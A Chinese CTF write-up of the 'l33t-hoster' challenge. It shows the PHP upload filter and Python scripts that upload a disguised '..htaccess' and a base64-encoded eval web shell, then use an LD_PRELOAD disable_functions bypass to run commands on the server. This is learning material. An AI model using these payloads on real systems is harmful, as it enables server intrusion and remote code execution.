l33t-hoster

这个题做了两天了

拼尽全力卡在最后一步 最后决定先放放 感觉是平台flag有点问题(之前有个题也是flag为空)

明天总结下学习的知识点 先记录下做题过程 看了很多大佬的博客

先看源代码发现 /?source 看这个页面 发现过滤的代码

<?php

if (isset($_GET"source"))

die(highlight_file(FILE));

session_start();

if (!isset($_SESSION"home")) {

$_SESSION"home" = bin2hex(random_bytes(20));

}

userdir = "images/{_SESSION"home"}/";

if (!file_exists($userdir)) {

mkdir($userdir);

}

$disallowed_ext = array(

"php",

"php3",

"php4",

"php5",

"php7",

"pht",

"phtm",

"phtml",

"phar",

"phps",

);

if (isset($_POST"upload")) {

if ($_FILES'image''error' !== UPLOAD_ERR_OK) {

die("yuuuge fail");

}

tmp_name = _FILES"image""tmp_name";

name = _FILES"image""name";

parts = explode(".", name);

ext = array_pop(parts);

if (empty($parts0)) {

array_shift($parts);

}

if (count($parts) === 0) {

die("lol filename is empty");

}

if (in_array(ext, disallowed_ext, TRUE)) {

die("lol nice try, but im not stupid dude...");

}

image = file_get_contents(tmp_name);

if (mb_strpos($image, "<?") !== FALSE) {

die("why would you need php in a pic.....");

}

if (!exif_imagetype($tmp_name)) {

die("not an image.");

}

image_size = getimagesize(tmp_name);

if (image_size\[0\] !== 1337 \|\| image_size1 !== 1337) {

die("lol noob, your pic is not l33t enough");

}

name = implode(".", parts);

move_uploaded_file(tmp_name, userdir . name . "." . ext);

}

echo "<h3>Your <a href=$userdir>files</a>:</h3><ul>";

foreach(glob(userdir . "\*") as file) {

echo "<li><a href='file'\>file</a></li>";

}

echo "</ul>";

?>

确实严格 php过滤的差不多我就想到了.htaccess 但要求实在太多了 没啥思路

就去看大佬博客了

https://blog.csdn.net/Uchiha_duan/article/details/131706725

https://blog.csdn.net/mochu7777777/article/details/113772879?ops_request_misc=elastic_search_misc\&request_id=0a7ed329acd0355e5f9fe1bd6843d728\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2\~all\~ElasticSearch\~search_v2-1-113772879-null-null.nonecase\&utm_term=l33t-hoster\&spm=1018.2226.3001.4450

python 复制代码
#!/usr/bin/env python3
import requests
import base64

VALID_WBMP = b"\x00\x00\x8a\x39\x8a\x39\x0a"
URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

COOKIES = {
    "PHPSESSID" : "m43d1fip3edjosh48kpjnqj0b2"
}

def upload_content(name, content):

    data = {
        "image" : (name, content, 'image/png'),
        "upload" : (None, "Submit Query", None)
    }
    
    response = requests.post(URL, files=data, cookies=COOKIES)

HT_ACCESS = VALID_WBMP + b"""
AddType application/x-httpd-php .jpg
php_value auto_append_file "php://filter/convert.base64-decode/resource=mochu7.jpg"
"""
TARGET_FILE = VALID_WBMP + b"AA" + base64.b64encode(b"""
<?php
  echo "shell ok!";
  eval($_POST['mochu7']);
?>
""")

upload_content("..htaccess", HT_ACCESS)
upload_content("mochu7.jpg", TARGET_FILE)

response = requests.post(URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg")
print(response.text)

先看末 初大佬的博客

学习到拿到shell 然后我是在ctf2(前buuctf)上做的

也遇到了mochu7=var_dump(file_get_contents('/flag'));返回bool(false)的问题

通过看

https://blog.csdn.net/Uchiha_duan/article/details/131706725

https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack 2019/l33t-hoster/l33t-hoster.md

学习到了LD_PRELOAD注射

python 复制代码
import requests
import base64
URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc.php');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file',('bypass_disablefunc.php',open("bypass_disablefunc.php","rb"),'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)
python 复制代码
import requests

URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc_x64.so');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file',('bypass_disablefunc_x64.so',open("bypass_disablefunc_x64.so","rb"),'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)

/bypass_disablefunc.php?cmd=ls /&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

https://274fcdc69af496cb834ecac5.http-ctf2.dasctf.com/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=ls /\&outpath=/tmp/xx\&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

再上传官方的pl文件

/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=perl fuck.pl&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

python 复制代码
import requests
import base64
URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/fuck.pl');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file',('fuck.pl',open("fuck.pl","rb"),'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)
相关推荐
心中有国也有家2 分钟前
使用 DevEco Studio 配置 Flutter 鸿蒙签名
学习·flutter·华为·harmonyos
灯澜忆梦5 分钟前
MySQL 完整学习路线
学习·mysql
森林古猿11 小时前
再论斜率优化
c++·学习·算法
心中有国也有家2 小时前
鸿蒙Flutter开发环境从零搭建教程(Windows/macOS双平台·避坑版)
学习·flutter·华为·harmonyos
十月的皮皮3 小时前
C语言学习笔记20260706-栈的压入、弹出序列验证
c语言·笔记·学习
心中有国也有家4 小时前
Flutter 鸿蒙适配第一步:从 hive 迁移到 hive\_ce
hive·学习·flutter·华为·harmonyos
chengbei124 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
渣渣灰飞4 小时前
MySQL 系统学习 第二阶段 第三章 DQL(Data Query Language)第二节:WHERE 条件查询
sql·学习·mysql
心中有国也有家5 小时前
AtomGit Flutter 鸿蒙客户端:E-Brufen 架构设计
学习·flutter·华为·harmonyos
hssfscv5 小时前
QT的学习笔记4——QMainWindow、资源文件以及主要控件的介绍
笔记·qt·学习